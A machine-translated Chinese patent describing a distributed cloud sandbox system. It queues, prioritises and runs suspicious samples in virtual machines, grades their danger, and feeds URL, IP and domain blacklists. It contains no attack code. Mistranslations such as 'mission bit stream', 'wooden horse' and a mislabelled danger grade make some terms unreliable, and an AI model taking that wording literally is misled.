CN107171894A - The method of terminal device, distributed high in the clouds detecting system and pattern detection - Google Patents
The method of terminal device, distributed high in the clouds detecting system and pattern detection Download PDFInfo
- Publication number
- CN107171894A CN107171894A CN201710453830.3A CN201710453830A CN107171894A CN 107171894 A CN107171894 A CN 107171894A CN 201710453830 A CN201710453830 A CN 201710453830A CN 107171894 A CN107171894 A CN 107171894A
- Authority
- CN
- China
- Prior art keywords
- task
- data
- mission bit
- bit stream
- sample
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L43/00—Arrangements for monitoring or testing data switching networks
- H04L43/50—Testing arrangements
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/10—Protocols in which an application is distributed across nodes in the network
Abstract
The embodiments of the invention provide a kind of method of terminal device, distributed high in the clouds detecting system and pattern detection, wherein distributed high in the clouds detecting system includes:Multiple single node sandboxs;Including:Multiple pending mission bit streams are determined according to the first preset rules, and send multiple pending mission bit streams to shared queue, after at least one request message is received, its each self-corresponding mission bit stream is obtained from shared queue according to each request message, and being distributed for it for task is performed respectively by multiple single node sandboxs, the data produced during tasks carrying are obtained, then send the data produced during tasks carrying to corresponding database.The embodiment of the present invention can be detected to the sample of magnanimity, improve the efficiency to pattern detection.
Description
Technical field
The present invention relates to Internet technical field, specifically, the present invention relates to terminal device, distributed high in the clouds detection system
The method of system and pattern detection.
Background technology
With the development of information technology, internet and terminal also develop therewith, thus will produce substantial amounts of data, and
By analyzing these data produced, to realize the detection to internet and terminal, it is ensured that internet and terminal
Information security.
At present, a kind of method of pattern detection, researcher obtains substantial amounts of sample, and is the detection such as dynamic by static state
Method, is researched and analysed to the great amount of samples got, but when the method by prior art, sample is detected
When, it due to manually being tested and analyzed to great amount of samples, will cause costly, and and consume the substantial amounts of time, and then cause
It is relatively low to the detection efficiency of sample.
The content of the invention
To overcome above-mentioned technical problem or solving above-mentioned technical problem at least in part, spy proposes following technical scheme:
Embodiments of the invention according to one side there is provided a kind of method of pattern detection, applied to distributed high in the clouds
Detecting system, distributed high in the clouds detecting system includes:Multiple single node sandboxs;Method includes:
Multiple pending mission bit streams are determined according to the first preset rules, and multiple pending mission bit streams are sent
To shared queue;
After at least one request message is received, its each correspondence is obtained from shared queue according to each request message
Mission bit stream, and perform being distributed for it for task respectively by multiple single node sandboxs, obtain generation during tasks carrying
Data;
The data produced during tasks carrying are sent to corresponding database.
Specifically, the mode of single node sandbox execution task includes:
Read the mission bit stream of highest priority;
Determine whether include specific sample in the mission bit stream of highest priority;
If comprising specific sample, being modified to specific parametric environmental;
After amendment is finished, the parameter configuration in the service condition and mission bit stream of Current resource is true
Surely the task is performed;
After the tasks carrying is finished, corresponding task status is changed.
Alternatively, the parameter configuration in the service condition and mission bit stream of Current resource is determined to perform and is somebody's turn to do
After the step of task, in addition to:
If it is determined that performing the task, then the task is run in virtual machine, and by the data storage produced in operation extremely
Local disk.
Optionally it is determined that after the step of whether including specific sample in the mission bit stream of highest priority, in addition to:
If not including specific sample in the mission bit stream of highest priority, only comprising md5 identifiers, then marked according to md5
Know symbol and download corresponding sample;
According to the task number being currently executing, it is determined whether perform the including the download sample of the task;
If it is determined that performing the including the download sample of the task, then according to the download sample, json files, json files are generated
In include the specifying information of task;
According to the specifying information of task, the report of specified format is generated, and changes corresponding task status.
Alternatively, in the use state information and/or local data base of local resource task overstocks status information,
Task requests are sent to server, task requests are used for server request task information;
The mission bit stream that the reception server is returned, and mission bit stream is stored to local data base.
Specifically, task data is included in mission bit stream;
The step of mission bit stream is stored to local data base, including:
Compression duty data, and the task data after compression is stored to local data base.
Specifically, the step of data produced during tasks carrying being sent to corresponding database, including:
By the second preset rules, the data of black data are belonged in the data produced during screening tasks carrying, and will
Belong to the data of black data to black data storehouse.
Alternatively, every preset time, Clean Up Database.
Embodiments of the invention additionally provide a kind of distributed high in the clouds detecting system according on the other hand, including:
Sandbox cluster inlet module, for determining multiple pending mission bit streams according to the first preset rules;Will be multiple
Pending mission bit stream is sent to shared queue;After at least one request message is received, according to each request message from
Its each self-corresponding mission bit stream is obtained in shared queue;
Single node sandbox module, for performing being distributed for it for task respectively by multiple single node sandboxs, obtains task
The data produced in implementation procedure;
The distributed storage cluster module of expansible type, is additionally operable to produce in single node sandbox module design task implementation procedure
Data send to corresponding database.
Specifically, single node sandbox module, the mission bit stream specifically for reading highest priority;Determine highest priority
Mission bit stream in whether include specific sample;When comprising specific sample, specific parametric environmental is modified;When
After amendment is finished, the parameter configuration in the service condition and mission bit stream of Current resource determines to perform this
Business;After the tasks carrying is finished, corresponding task status is changed.
Alternatively, single node sandbox module, is specifically additionally operable to if it is determined that performing the task, then by the task in virtual machine
Operation, and by the data storage produced in operation to local disk.
Alternatively, single node sandbox module, is specifically additionally operable to specific when not included in the mission bit stream of highest priority
Sample, when only comprising md5 identifiers, corresponding sample is downloaded according to md5 identifiers;According to being currently executing for task
Number, it is determined whether perform the task for the download sample downloaded comprising download module;When it is determined that performing comprising the download sample
During task, the download sample downloaded according to download module generates the specific letter for including task in json files, json files
Breath;According to the specifying information of task, the report of specified format is generated;Change corresponding task status.
Alternatively, distributed high in the clouds detecting system also includes:Single node sandbox request of data and resource cleaning modul;
Single node sandbox request of data and resource cleaning modul, for the use state information according to local resource and/
Or the task in local data base overstocks status information, task requests are sent to server, task requests are used for please to server
Seek mission bit stream;The mission bit stream that the reception server is returned;Mission bit stream is stored to local data base.
Specifically, the distributed storage cluster module of expansible type, specifically for by the second preset rules, screening task
Belong to the data of black data in the data produced in implementation procedure, and the data of black data will be belonged to black data storehouse.
Alternatively, single node sandbox request of data and resource cleaning modul, are additionally operable to, every preset time, clear up data
Storehouse.
Alternatively, distributed high in the clouds detecting system also includes:Distributed high in the clouds detecting system monitoring module;
Distributed high in the clouds detecting system monitoring modular, for monitor sandbox cluster inlet module, single node sandbox module, can
The distributed storage cluster module and single node sandbox request of data and resource cleaning modul of expansion type.
Embodiments of the invention are additionally provided in a kind of terminal device, the structure of terminal device and wrapped according to another aspect
Processor and memory are included, memory is used to store the program for supporting R-T unit to perform the above method, and processor is configured as
The program stored for performing in memory.
Embodiments of the invention additionally provide a kind of computer-readable storage medium according to another aspect, above-mentioned for saving as
Computer software instructions used in terminal device, it, which is included, is used to perform program of the above-mentioned aspect designed by terminal device.
It is and existing the invention provides a kind of method of distributed high in the clouds detecting system, terminal device and pattern detection
The method of pattern detection compare, the present invention is applied to distributed high in the clouds detecting system, and distributed high in the clouds detecting system includes:It is many
Individual single node sandbox;Multiple pending mission bit streams are determined according to the first preset rules, and multiple pending tasks are believed
Breath is sent to shared queue, then after at least one request message is received, according to each request message from shared queue
Obtain its each self-corresponding task, and performed respectively as its distribution task by multiple single node sandboxs, obtain tasks carrying mistake
The data produced in journey, then send the data produced during tasks carrying to corresponding database, i.e., distributed high in the clouds
Multiple single node sandboxs are provided with detecting system, and can simultaneously be performed by multiple single node sandboxs as appointing that it is distributed
Business, and the data that are produced during tasks carrying are obtained, and the data of generation can be sent to corresponding database, with reality
Now to the detection of sample, due to being detected by multiple single node sandboxs to sample, without manually to substantial amounts of sample
Detected one by one, so as to reduce the cost of pattern detection, and due to performing difference simultaneously by multiple single node sandboxs
Task, so as to reduce the time loss of pattern detection, and then the detection efficiency to sample can be improved.
The additional aspect of the present invention and advantage will be set forth in part in the description, and these will become from the following description
Obtain substantially, or recognized by the practice of the present invention.
Brief description of the drawings
Of the invention above-mentioned and/or additional aspect and advantage will become from the following description of the accompanying drawings of embodiments
Substantially and be readily appreciated that, wherein:
Fig. 1 is a kind of method flow diagram of pattern detection of the embodiment of the present invention;
Fig. 2 is the distributed high in the clouds detecting system schematic diagram of the embodiment of the present invention;
Fig. 3 is the structural representation of terminal device in the embodiment of the present invention.
Embodiment
Embodiments of the invention are described below in detail, the example of the embodiment is shown in the drawings, wherein from beginning to end
Same or similar label represents same or similar element or the element with same or like function.Below with reference to attached
The embodiment of figure description is exemplary, is only used for explaining the present invention, and is not construed as limiting the claims.
Those skilled in the art of the present technique are appreciated that unless expressly stated, singulative " one " used herein, " one
It is individual ", " described " and "the" may also comprise plural form.It is to be further understood that what is used in the specification of the present invention arranges
Diction " comprising " refer to there is the feature, integer, step, operation, element and/or component, but it is not excluded that in the presence of or addition
Other one or more features, integer, step, operation, element, component and/or their group.It should be understood that when we claim member
Part is " connected " or during " coupled " to another element, and it can be directly connected or coupled to other elements, or can also exist
Intermediary element.In addition, " connection " used herein or " coupling " can include wireless connection or wireless coupling.It is used herein to arrange
Taking leave "and/or" includes one or more associated wholes or any cell for listing item and all combines.
Those skilled in the art of the present technique are appreciated that unless otherwise defined, all terms used herein (including technology art
Language and scientific terminology), with the general understanding identical meaning with the those of ordinary skill in art of the present invention.Should also
Understand, those terms defined in such as general dictionary, it should be understood that with the context with prior art
The consistent meaning of meaning, and unless by specific definitions as here, otherwise will not use idealization or excessively formal implication
To explain.
Those skilled in the art of the present technique are appreciated that " terminal " used herein above, " terminal device " both include wireless communication
The equipment of number receiver, it only possesses the equipment of the wireless signal receiver of non-emissive ability, includes receiving again and transmitting hardware
Equipment, its have can on bidirectional communication link, carry out two-way communication reception and launch hardware equipment.This equipment
It can include:Honeycomb or other communication equipments, it has single line display or multi-line display or shown without multi-line
The honeycomb of device or other communication equipments;PCS (Personal Communications Service, PCS Personal Communications System), it can
With combine voice, data processing, fax and/or its communication ability;PDA (Personal Digital Assistant, it is personal
Digital assistants), it can include radio frequency receiver, pager, the Internet/intranet access, web browser, notepad, day
Go through and/or GPS (Global Positioning System, global positioning system) receiver;Conventional laptop and/or palm
Type computer or other equipment, its have and/or conventional laptop and/or palmtop computer including radio frequency receiver or its
His equipment." terminal " used herein above, " terminal device " they can be portable, can transport, installed in the vehicles (aviation,
Sea-freight and/or land) in, or be suitable for and/or be configured in local runtime, and/or with distribution form, operate in the earth
And/or any other position operation in space." terminal " used herein above, " terminal device " can also be communication terminal, on
Network termination, music/video playback terminal, for example, can be PDA, MID (Mobile Internet Device, mobile Internet
Equipment) and/or the equipment such as mobile phone or intelligent television with music/video playing function, set top box.
Embodiment one
The embodiments of the invention provide a kind of method of pattern detection, as shown in figure 1, applied to distributed high in the clouds detection system
System, distributed high in the clouds detecting system includes:Multiple single node sandboxs;Including:
Step 101, determine multiple pending mission bit streams according to the first preset rules, and by multiple pending tasks
Information is sent to shared queue.
For the embodiment of the present invention, the first preset rules can include the priority and other composite factors of task.
For the embodiment of the present invention, before step 101, collect in initial data, the initial data and include for various types of
The analysis result of the network malicious act of type, such as comprising the URL about malicious web pages and relevant various leaks, virus, wood
Horse, the sample object of attack.
In the present embodiment, collected initial data includes the analysis result for various types of network malicious acts,
For example comprising the URL about malicious web pages and about various leaks, virus, wooden horse, the sample object attacked.In addition,
Sample object also includes:0Day, NDay, exposure period 0Day, position extension horse information, the follow-up of important website and position extension horse etc.
Deng.Wherein, 0Day is has been found to and (is possible to not be disclosed), and official's also leak without associated patch.These leaks
, for example can be with edit the registry, download file, runtime file using 0Day immediately by malicious exploitation after being found.Sample
The form of target can be file, executable program etc..Do not limit in embodiments of the present invention.
For the embodiment of the present invention, collected original threat data can be the data that client is uploaded, visitor here
Family end can be the user terminal for detecting various network malicious acts.In actual applications, client can be by default
Process list is monitored to the dangerous process in login process or payment process;Or pass through default safe listed files
The file transmitted in login process or payment process is monitored;Or the browser in login process or payment process is adjusted
It is monitored with behavior;Or the calling for input through keyboard content in login process or payment process is monitored;Or it is right
The data object of client transmissions is monitored in login process or payment process.
Client is monitored to the object transfer unrelated with login process or payment process with logging in or paying phase for example, working as
During the data of pass, then transmitted data object should be intercepted;Or the webpage to being opened in login process or payment process
It is monitored, for example, in login process or payment process, it is what malicious third parties were forged that what user may open, which pays webpage,
With webpage as true payment web page class, it is therefore desirable to which the webpage opened is monitored.
Wherein, when monitoring the file such as executable file, the real-time download situation of file can be not only monitored, can be with
Real time execution situation of monitoring file when being activated and after being activated.Client is obtained in detection after threat data, generation
Daily record is temporarily stored into log buffer inventory.The log recording thread poll log buffer inventory of client and according to first in first out
Mode handles daily record successively, and log content is added in write-in log record file, is obtained by outside related scheduler module process
And handle the journal file and uploaded.Asked for example, message can be sent by client and obtained, obtained and asked according to message
In request push time and message received list, the new information not being transmitted across to the client is obtained from message queue,
And to client feedback response message, the response message includes the second push time and new information list, in new information list
Include the message id and message content of this all new information issued to client, second pushes the push that the time is new information
Time.Wherein, the threat data uploaded can include environment and document base information, detection function point trigger data etc..Its
Middle environment and document base information are exported in forms such as flowing water daily records, and detection function point trigger data is with user behaviors log
Actions.log form output.By taking sample as an example, environment and document base information are specially sample process file MD5, sample
Process file path, major system modules title and FileVersion etc.;Detection function point trigger data is specially involved to enter
Journey ID and/or Thread Id, are tampered the title of function, the pointer value after distorting, Hooked API etc. where during detection.
For the embodiment of the present invention, the source-information based on sample and/or the sample reliability through being determined to screening sample,
To set up Detection task, and detection priority is determined for above-mentioned Detection task.If the sample reliability determined through screening is higher,
Determine that the Detection task has higher detection priority;If the sample reliability determined through screening is relatively low, it is determined that the detection
Task has relatively low detection priority.Wherein, the reliability is with belonging to the possibility of black data and being associated with important website
Property is relevant.
Step 102, after at least one request message is received, it is obtained from shared queue according to each request message
Each self-corresponding mission bit stream, and being distributed for it for task is performed by multiple single node sandboxs, during obtaining tasks carrying
The data of generation.
For the embodiment of the present invention, after at least one request message is received, according to each request message from shared team
Its each self-corresponding task is obtained in row.In embodiments of the present invention, scheduling node can distribute to Detection task each list
Node sandbox, each single node sandbox performs the task for its distribution respectively, obtains task testing result.
For the embodiment of the present invention, Detection task is distributed to point by scheduling node after the Detection task issued is received
Cloth high in the clouds detecting system.In order to further lift distributed high in the clouds detection system in the security of threat data detection, the present invention
System can be specially distributed sandbox group system, and distributed sandbox group system is tested and analyzed using sandbox technology, sandbox
The running environment of a closing is provided for suspicious sample daily record, so, even if the corresponding sample of suspicious sample daily record is deposited really
In leak, server side will not also be caused damage.
For the embodiment of the present invention, static engine and dynamic engine are deployed with distributed cluster system respectively to threatening
Detection task carries out static analysis and dynamic is analyzed.Wherein, static engine can extract URL information and/or sample format information is entered
Row static analysis, the URL information extracted including but not limited to:IP, domain name, URL MD5 values etc., sample format packet
Contain but be not limited to:Leak/Virus Name, URL information, similarity of character string of PE samples etc.;Dynamic engine mainly captures behaviour
Make system action data, leak corelation behaviour data and/or network corelation behaviour data and enter Mobile state analysis.
For the embodiment of the present invention, by taking kernel leak as an example, dynamic engine is to critical behavior or the related API of function tune
With hook is carried out, whether the title or attribute than pair correlation function are tampered or replace, so as to obtain the identification day of kernel leak
Will.
For the embodiment of the present invention, complete analysis again is carried out using sandbox detection mode by the PE files of cloud killing and examined
Survey.For non-PE files, such as rich text format (Rich Text Format, hereinafter referred to as rich text format), PDF format, Doc
A kind of (file extension) form, docx (a kind of file extension) form and excel forms etc., if file is can be after
The document of continuous decompression, then return and proceed decompression operation, if file is detectable metadata, carries out QEX static
Analysis, filling data (shellcode) half dynamic detection and lightVM light weights are dynamically analyzed.Afterwards, sandbox detection pair is utilized
The metadata detected by three of the above is detected again.When whether there is the detection of malicious act to file, it is preferable that
In the embodiment of the present invention, the danger classes of malicious act can be divided into Three Estate.First, it is high-risk, that is, it is able to confirm that first number
According to wooden horse sample, obvious malicious act or the vulnerability exploit that can be triggered for malicious code, such as determination.Second, in
, that is, there is doubtful malicious act in danger, but can not determine, or doubtful vulnerability exploit, but the malicious act not determined still, example
Such as find that sample can access following sensitive position, or sample causes program crashing, but performed without triggering.3rd, low danger,
The i.e. non-file that means no harm by confirming, may endanger system safety, it can be understood as there is the file of risk.
In the present embodiment, distributed cluster system can also obtain third party in addition to being analyzed using the engine of oneself
The authentication information that platform or third party's engine are provided, so that abundant qualification result.
In addition, distributed cluster system can be also associated between analysis, concrete analysis URL, whether have between sample
Relevance, by analyzing the relevance between black data, as data are more and more, the black data of accumulation is also more and more.
For the embodiment of the present invention, the mode that single node sandbox performs task includes step a-e as shown below (in figure not
Mark), wherein,
Step a, the mission bit stream for reading highest priority.
For the embodiment of the present invention, scheduling node reads current priority highest mission bit stream from shared queue, and
The mission bit stream of the current highest priority is distributed into a certain single node sandbox, to cause the single node sandbox to perform this
Business.
For example, there is currently three mission bit streams in shared queue, the respectively mission bit stream of task 1, the task of task 2
The mission bit stream of information and task 3, and the priority orders of above three mission bit stream are followed successively by task 1 from high to low
The mission bit stream of mission bit stream, the mission bit stream of task 3 and task 2, then after request message is received, scheduling node is first
The mission bit stream of task 1 is distributed into the single node sandbox, to cause the single node sandbox to perform the task 1.
Step b, determine whether include specific sample in the mission bit stream of highest priority.
For the embodiment of the present invention, after step b, in addition to:If not comprising specific in the mission bit stream of highest priority
Sample, only comprising md5 identifiers, then corresponding sample is downloaded according to md5 identifiers;According to being currently executing for task
Number, it is determined whether perform the including the download sample of the task;If it is determined that performing the including the download sample of the task, then according under this
Load sample sheet, generates the specifying information for including task in json files, json files;According to the specifying information of task, generation is specified
The report of form, and change corresponding task status.
For the embodiment of the present invention, if not including specific sample in the mission bit stream of the highest priority, only comprising md5
Value, then download the corresponding specific sample of the md5 values from database, then according to appointing that the single node sandbox is currently executing
Business number, it is determined whether perform the including the download sample of the task.
For the embodiment of the present invention, the task number being currently executing according to the single node sandbox and the pass of preset threshold value
System, it is determined whether perform the including the download sample of the task;Further, when the task that the single node sandbox is currently executing
When number is not more than preset threshold value, it is determined that performing the task of the download sample;If what the single node sandbox was currently executing appoints
Number of being engaged in is more than preset threshold value, and the single node sandbox does not perform the including the download sample of the task.
For the embodiment of the present invention, however, it is determined that perform the including the download sample of the task, then daily record sample is handled
The json files of specifying information of the generation comprising task, rule match is carried out to all log informations, generation specified format
Report, and store into specified storage assembly, for example, mongoDB, ceph etc..
If step c, comprising specific sample, specific parametric environmental is modified.
Wherein, specific sample can include agreement (the English full name interconnected between network:Internet Protocol,
English abbreviation:IP), domain name etc..
For the embodiment of the present invention, server side sets up cloud security query interface, and browser can be inquired about by the cloud security
The IP address of website is reported server by interface.
For the embodiment of the present invention, for the characteristics of overseas the risk factor of IP address is higher than domestic IP address in internet,
If IP address is IP address overseas, the ratio of the quantity of fishing website and the quantity of non-fishing website is higher than under the IP address
In the case of first given threshold, by IP address storage into dangerous IP databases.In embodiments of the present invention, can also be straight
Connect according to the quantity of fishing website under domain name to determine whether the domain name is dangerous domain name, the quantity of fishing website under such as certain domain name
If above setting quantity (such as 1000), then it is dangerous domain name that can determine the domain name;In addition, if confirming that some domain names are true
For the domain name of highly dangerous, it can also be stored to by being manually entered in dangerous dns database.
Alternatively, dangerous dns database not only can store domain name in itself, can also store the risk factor rank of domain name.
In embodiments of the present invention, the risk factor rank can be by the ratio of fishing website quantity under domain name and the quantity of non-fishing website
Example determines that ratio is higher, risk factor rank is higher;Conversely, risk factor rank is lower.
Step d, after amendment is finished, according to the parameter configuration in the service condition and mission bit stream of Current resource
Information determines to perform the task.
For the embodiment of the present invention, after being modified to specific parametric environmental, the use feelings of Current resource are determined
Whether condition is less than resources left threshold value, and/or parameter configuration in current task information determines whether to perform this
Business.In embodiments of the present invention, when the service condition of Current resource is not less than resources left threshold value, and/or current task information
In parameter configuration support perform the task, it is determined that perform the task.
For the embodiment of the present invention, however, it is determined that perform the task, then return to 200, however, it is determined that do not perform the task, then return
500.Do not limit in embodiments of the present invention.
For the embodiment of the present invention, also include after step d:If it is determined that performing the task, then by the task in virtual machine
Middle operation, and by the data storage produced in operation to local disk.
For the embodiment of the present invention, after the task is run in virtual machine, operation result is stored to local disk
In.
Step e, after the tasks carrying is finished, change corresponding task status.
For the embodiment of the present invention, if the task is not carried out, or the task is carrying out, but is not carried out finishing, then should
Task status is unfinished state;If being that unfinished state is revised as having completed by task status after the tasks carrying is finished
State.In embodiments of the present invention, if the task is not carried out, the state of the task is is not carried out state, if working as task
Perform, but be not carried out finishing, be then revised as being carrying out state by the task status;If the tasks carrying is finished, by this
Business status modifier is completion status.Do not limit in embodiments of the present invention.
Step 103, the data produced during tasks carrying are sent to corresponding database.
For the embodiment of the present invention, the database can include black list database.Wherein, the black list database bag
Include:URL black list databases, IP black list databases and/or domain name black list database.
For the embodiment of the present invention, the danger classes of sample can be determined according to the data produced during tasks carrying,
The danger classes of sample can be for example divided into Three Estate, respectively the first estate, high-risk grade;Second grade, middle danger etc.
Level;The tertiary gradient, high-risk grade.
For the embodiment of the present invention, high-risk grade sample characterizes the original code for malicious code, such as wooden horse sample of determination,
Sample with obvious malicious act or sample of leak etc. can be triggered;Middle danger grade sample is the presence of doubtful malice
Behavior, but the sample that can not be determined, or doubtful vulnerability exploit but the malicious act that does not determine still, for example, find that sample can be visited
Ask that following sensitive position, or sample cause program crashing, but performed without triggering.Low danger grade sample is non-by confirming
The file that means no harm, may endanger system safety, it can be understood as there is the file of risk.
Alternatively, first by client computer collection procedure feature and its corresponding program behavior, and it is sent to service
Device end;Then different performance of program and its corresponding program behavior, and black/white name are recorded in server-side database
It is single;With reference to the performance of program and its corresponding program behavior in existing known black/white list, to unknown program feature and program line
To be analyzed, to update black/white list.
For the embodiment of the present invention, due to have recorded performance of program and the corresponding behavior record of this feature in database,
Therefore known black/white name single pair of unknown program can be combined to be analyzed.
If for example, unknown program feature is identical with the known procedure feature in existing black/white list, by the unknown journey
Sequence characteristics and its program behavior are all included in black/white list;If unknown program behavior and the known procedure in existing black/white list
Behavior is identical or approximate, then the unknown program behavior and its performance of program is all included in into black/white list.
For the embodiment of the present invention, because some viruses by technologies such as mutation or shell addings can change condition code, but its
Behavior is without there is very big change, and therefore, the comparative analysis recorded by program behavior more can easily determine some not
Whether be rogue program, this comparative analysis sometimes does follow-up analysis in itself even without the behavior to program if knowing program,
Only need to it is simple with existing black/white list in known procedure behavior compare and can determine that the property of unknown program.At this
In inventive embodiments, pass through the record analysis in database, it is known that have the behavior of some programs identical or approximate, but performance of program
Difference, at this moment, as long as we set up the incidence relation of behavior and feature, and root between the program with identical or approximate behavior
According to this incidence relation, it is possible to more easily unknown program feature and program behavior are analyzed, to update black/white name
It is single.
The embodiments of the invention provide a kind of method of pattern detection, compared with the method for existing pattern detection, this hair
Bright embodiment is applied to distributed high in the clouds detecting system, and distributed high in the clouds detecting system includes:Multiple single node sandboxs;According to
One preset rules determine multiple pending mission bit streams, and multiple pending mission bit streams are sent to shared queue, so
Afterwards after at least one request message is received, its each self-corresponding is obtained from shared queue according to each request message
Business, and performed respectively as its distribution task by multiple single node sandboxs, the data produced during tasks carrying are obtained, then
The data produced during tasks carrying are sent to corresponding database, i.e., are provided with distributed high in the clouds detecting system multiple
Single node sandbox, and being distributed for it for task can be performed simultaneously by multiple single node sandboxs, and obtain tasks carrying
During the data that produce, and the data of generation can be sent to corresponding database, to realize the detection to sample, due to
Sample is detected by multiple single node sandboxs, without manually being detected one by one to substantial amounts of sample, so as to
To reduce the cost of pattern detection, and due to performing different tasks simultaneously by multiple single node sandboxs, so as to reduce
The time loss of pattern detection, and then the detection efficiency to sample can be improved.
Embodiment two
The alternatively possible implementation of the embodiment of the present invention, on the basis of embodiment one, in addition to embodiment two
Performed by shown step 201-202 (not marked in figure), the wherein operation performed by step 203-205 and step 101-103
Operation it is similar, will not be repeated here.
Step 201, state letter is overstock according to the task in the use state information and/or local data base of local resource
Breath, task requests are sent to server.
Wherein, task requests are used for server request task information.
For the embodiment of the present invention, Recv process initiations determine the use state information and/or local data of local resource
Task in storehouse overstocks status information.In embodiments of the present invention, when the use state information of local resource meets local resource
Default use state information, and/or task in local data base overstocks status information and meets default in local data base
Task overstocks state, then sends task requests message to server, with to server request task information.
The mission bit stream that step 202, the reception server are returned, and mission bit stream is stored to local data base.
Wherein, if including task data in the mission bit stream, the step of mission bit stream is stored to local data base, tool
Body includes:Compression duty data, and the task data after compression is stored to local data base.
For the embodiment of the present invention, Callback process initiations compress all task datas by zip, and by after compression
Task data store to local data base.
For the embodiment of the present invention, compress all task datas by zip, and by the task data after compression store to
Local data base, i.e., by the way that the data to be stored into local data base are compressed, can save in local data base
Memory space.
For the embodiment of the present invention, every preset time Clean Up Database.
, can be every preset time Clean Up Database for the embodiment of the present invention, the database not only includes local data
Storehouse, can also be including black list database etc..In embodiments of the present invention, after local data base receives request requests,
Return data, and after returning successfully, clean out the data stored in local data base.
, can be expired by what is stored in database by every preset time Clean Up Database for the embodiment of the present invention
Data scrubbing is fallen or useless data scrubbing is fallen, so as to avoid data out of date or useless data from taking data
The memory space in storehouse, causes data to be stored not store to database, and then can avoid the memory space of database not
Sufficient the problem of.
Embodiment three
The alternatively possible implementation of the embodiment of the present invention, on the basis of shown in embodiment one, step 103, general
The data produced during tasks carrying are sent to corresponding database, including the step 303-304 shown in embodiment three is (in figure
Do not mark), wherein,
Step 303, by the second preset rules, the number of black data is belonged in the data produced during screening tasks carrying
According to.
Step 304, the data of black data will be belonged to black data storehouse.
For the embodiment of the present invention, the data produced during tasks carrying be properly termed as identify daily record, scheduling node from
Identification daily record is extracted in caching, corresponding module is tasked into identification daily record classification and does parsing and rule judgement, wherein in module
Portion is previously provided with various rules.In embodiments of the present invention, specific rule and regular quantity are not limited, normal conditions
Lower set rule can reach hundreds of.
For example, when user opens include SWF files on webpage, webpage in a browser, client is automatically waken up to this
SWF files are detected, if detecting the SWF files there may be leak, just make a call to a suspicious sample on the SWF files
This daily record, includes the signing messages of the SWF files, the source information of the SWF files, the SWF files in the suspicious sample daily record
URL addresses, IP address of client etc., and by the suspicious sample daily record upload onto the server end further detected.
Wherein, the corresponding sample of suspicious sample daily record is SWF (English full name:Shock Wave Flash) file is
The animation software Flash of Adobe companies professional format, is widely used in the fields such as cartoon making, webpage design;Each
Browser application in client can carry out Preliminary detection when running SWF files during opening webpage to the SWF files,
When detecting that SWF files there may be security risk, it is uploaded to the relevant information of the SWF files as suspicious sample daily record
The suspicious sample daily record of each SWF files includes in server end, this example:The signing messages of the SWF files, the SWF files
URL addresses, IP address, uplink time, the source information of the SWF files of client etc. that upload the suspicious sample daily record.Clothes
Business device is first passed through in each suspicious sample daily record of comparison after the suspicious sample daily record for the SWF files that each client is uploaded is got
SWF files signing messages come to corresponding to identical SWF files suspicious sample daily record carry out duplicate removal;For being remained after duplicate removal
Under every suspicious sample daily record, the URL addresses of the SWF files in the suspicious sample daily record are input in sandbox, in sandbox
Middle startup browser application, the network request on the corresponding SWF files of the suspicious sample daily record is sent according to the URL addresses,
The SWF files are rendered, until rendering completion, middle behavior of the SWF files in render process is recorded, obtained
Scan daily record;Judge that the SWF files whether there is leak according to the scanning daily record;It is that then, will indicate that the SWF files have leak
Warning message send into the client of the suspicious sample daily records of all upload SWF files, can be with the warning message
Comprising upload the SWF files suspicious sample daily record client quantity, upload the suspicious sample daily record of the SWF files most
Early uplink time, the source information of the SWF files, reparation service packs of the leak of the SWF files etc. understand for corresponding client
The information of the leak of the SWF files;Otherwise, it will indicate that Hole Detection results of the SWF in the absence of leak is sent to all to upload
In the client of the suspicious sample daily record of the SWF files, and the unique mark (such as signing messages) of the SWF files is remembered
Record, when next time gets the suspicious sample daily record of the SWF files from client again, directly by the Hole Detection knot of the SWF files
Fruit is back to corresponding client.
For the embodiment of the present invention, by setting rule, carrying out judgement using rule can quickly solve because of rogue program
Various entity mutation, the uncertainty brought of behavior mutation cause the problem of fail-safe software killing rate declines.Specifically, advise
Function is then set to may include the parts such as language description, visualization rule editing interface, speech analyser, Dynamic Matching device.Language
Description is returned after containing regular type, rule numbers, rule ID, random fit ratio, the limitation of matching maximum times, matching
Value and matching condition group.Matching condition group comprising multiple matching conditions with or, non-programmed combination.Each matching condition bag
Containing matching keywords, three parts of matching operation symbol and matching target data.
For the embodiment of the present invention, by carrying out class to the data produced during tasks carrying according to the second preset rules
Do not distinguish, and the data after differentiation are sent to corresponding database, can quickly solve the various realities because of rogue program
The uncertainty that body mutation, behavior mutation are brought causes the problem of fail-safe software killing rate declines.
For the embodiment of the present invention, distributed high in the clouds detecting system is obtained after identification daily record, and scheduling node is to identification day
Will is cached, while scheduling node stores buffered identification daily record into Hadoop group systems.
For the embodiment of the present invention, every preset time Clean Up Database.
For the embodiment of the present invention, distributed high in the clouds detecting system includes monitoring port Cubestone, can be to whole point
Cloth cloud sandbox system is monitored.In embodiments of the present invention, Cubestone provides the monitoring of all tasks of schedule, for example
Accuracy of process performance, mission failure rate and task result etc..
The embodiments of the invention provide the method for another pattern detection, by every preset time Clean Up Database, energy
Enough the stale data stored in database is cleaned out or useless data scrubbing is fallen, so as to avoid data out of date
Or useless data take the memory space of database, cause data to be stored not store to database, and then can be with
The problem of avoiding the memory space inadequate of database;Compress all task datas by zip, and by the task data after compression
Store to local data base, i.e., by the way that the data to be stored into local data base are compressed, local data can be saved
Memory space in storehouse;By carrying out class discrimination to the data produced during tasks carrying according to the second preset rules, and
Data after differentiation are sent to corresponding database, various entity mutation because of rogue program, OK can be quickly solved
The uncertainty brought by mutation causes the problem of fail-safe software killing rate declines.
The embodiments of the invention provide a kind of distributed high in the clouds by detecting system, as shown in Fig. 2 the distributed high in the clouds detection
System includes:Sandbox cluster inlet module 21, single node sandbox module 22, the distributed storage cluster module 23 of expansible type;
Wherein,
Sandbox cluster inlet module 21, for determining multiple pending mission bit streams according to the first preset rules;To be many
